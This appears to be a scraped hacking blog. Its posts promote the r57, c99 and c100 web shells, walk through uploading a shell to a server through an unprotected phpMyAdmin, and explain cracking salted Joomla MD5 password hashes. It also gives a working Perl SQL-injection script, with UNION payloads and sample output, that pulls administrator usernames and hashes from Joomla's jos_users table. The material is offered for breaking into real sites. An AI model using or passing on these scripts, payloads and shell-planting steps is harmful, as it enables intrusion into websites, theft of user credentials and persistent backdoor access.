Various famous shell injection

Maybe some of you do not know what it shell injection.Shell injection is a script that we put on the target server which is the entrance for us to master server. With the shell we can see the contents of the database server, which is binding, even we can get an interactive shell that will be used for rooting. This shell can be run on linux and windows systems and commands we adjust the target OS.
The following is a screenshot of the shell injection

r57 shell
Download r57shell here



c99shell
Download c99shell here



c100shell
Download c100shell here




Read More......

My Ubuntu...

This is the latest display of the Linux Ubuntu 8.10 which I use for Hacking ..
more cool and scary look ...


My Desktop



My Mozilla


Read More......

Upload Shell on phpMyAdmin

Greetings all ....
for those who already know this trick, i am sorry ...
there may be some colleagues - colleagues who do not know ...

PhpMyAdmin should be protected with a password, but still there are some web leave the default (no password), n we can use ...

Here I will show you how to upload shell on the localhost
we will create a form called form.php n upload a file called upload.php that allows you to upload a shell we will ....

First we must know the path of its document root
Picture 1


then we go into phpmyadmin to create a database
Picture 2.


the picture above we create a database called the shell in the text box "Create new database". After that, select the database called the shell n select the SQL tab, and enter the SQL Comment. Command below will create a table called the form and will create a file called form.php on DOCUMENT ROOT, in which the file will contain the html codes.
Like Picture 3


and if no errors will successfully create a file called form.php in the DOCUMENT ROOT
Picture 4.


Once we make these forms, then we must create a file uploader ....
Command below will create a table called upload and will create a file called upload.php in the DOCUMENT ROOT, in which the file will contain the form php codes
like Picture 5


and if no errors will successfully create a file called upload.php in the DOCUMENT ROOT
Picture 6.


After sekses, we lived was called form.php file there DOCUMENT ROOT, and the example is http://localhost/form.php
Picture 7.


We live to upload a shell to be placed on the web, for example, I will upload a shell, and if successful, would bring a blank page and the URL that points to a file called "upload.php". on my localhost pointing to http://localhost/upload.php
Like Picture 8.


This is an example of fruitful shell uplaod to my localhost server ..
Picture 9.


for his script and shell please download at
http://www.ziddu.com/download/8112213/upload_shell_on_phpmyadmin.zip.html

so first apologize if there are errors
Please corrected
Thanks

Read More......

Hacking sites

There are many sites that provide information for Hacking activities in this world. Maybe this is some of them ...


http://milw0rm.com/



http://www.securityfocus.com/



http://darkc0de.com/



http://www.darkmindz.com/



http://www.jasakom.com/



http://www.kecoak-elektronik.net/log/


From several sites on we will get a lot of information and hacking techniques ...
hopefully helpful...

Read More......

encryption Password Joomla

Joomla has implemented a model called md5salt encryption.
example is faae726c2d28d65735ba190c5b249e54:G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A

hash was found in the first part of faae726c2d28d65735ba190c5b249e54, nd salt was there at the end G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A, they appear on separate them with a colon ":"
Salt for the attacker works to assist in finding the actual password.
Found here is if the password in plain text form saltnya join it will generate a password hash joomla. in other words, if : x + salt = hash joomla. so that if implemented through encryption md5 :

md5(x + salt) = hash
so :
md5(x + G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A) = faae726c2d28d65735ba190c5b249e54

for crack it, we use a dictionary dictionary tool that can be downloaded at
http://www.ziddu.com/download/8111597/brute.zip.html

congratulations to crack passwords joomla and good luck ....



Read More......

Simple Script SQL Injection joomla

This is a simple joomla SQL Injection can create md5 passwords and form md5salt and we can determine how many rows from the table jos_user ...

!/usr/bin/perl -w
print "\t\t###############################################\n\n";
print "\t\t# Joomla SQL Injection #\n\n";
print "\t\t###############################################\n\n";
use LWP::UserAgent;
die "Contoh: perl $0 'http://joomla_web.com/path/index.php?option=com_contoh&id=1' 'baris_dari_pass'\n" unless @ARGV;
$user="username";
$pass="password";
$tabel="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $ARGV[0] .
"+AND+1=2+union+all+select+1,concat(CHAR(60,117,115,101,114,62),
".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),
".$pass.",CHAR(60,112,97,115,115,62)),3,4,5+from+".$tabel."
+LIMIT+".$ARGV[1].",1--";

$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~ /(.*?)/){
print "\n[+] Username : $1";
}
if ($answer =~/(.*?)/){
print "\n[+] password : $1\n\n";
print "\t\t# berhasil #\n\n";}
else{print "\n[-] gagal...\n";}

needs to be done is to determine the number of existing colom and how the numbers appear
example :
1. target is http://joomla_web.com/path/index.php?option=com_contoh&id=1
2. many colomns are 5 ===>+AND+1=2+UNION+SELECT+1,2,3,4,5--
3. number appears is 2 ===>+AND+1=2+UNION+SELECT+1,concat(CHAR(60,117,115,101,114,62),
".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),
".$pass.",CHAR(60,112,97,115,115,62)),3,4,5--

then you can use it
perl joomla.pl 'http://joomla_web.com/path/index.php?option=com_contoh&id=1' '0'
notes :
joomla.pl ==>name of file
'http://joomla_web.com/path/index.php?option=com_contoh&id=1' ==>joomla have vulnerability
'0' ==>first row from tabel jos_user, for second replace with '1', and so on

if successful it will be like this

###################################################

# Joomla SQL Injection #


###################################################


[+] Username : admin
[+] password : faae726c2d28d65735ba190c5b249e54:G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A

# berhasil #

now living to crack md salt

or you can download that script here
http://www.ziddu.com/download/8111490/joomla.zip.html

Read More......
Powered by NGELIH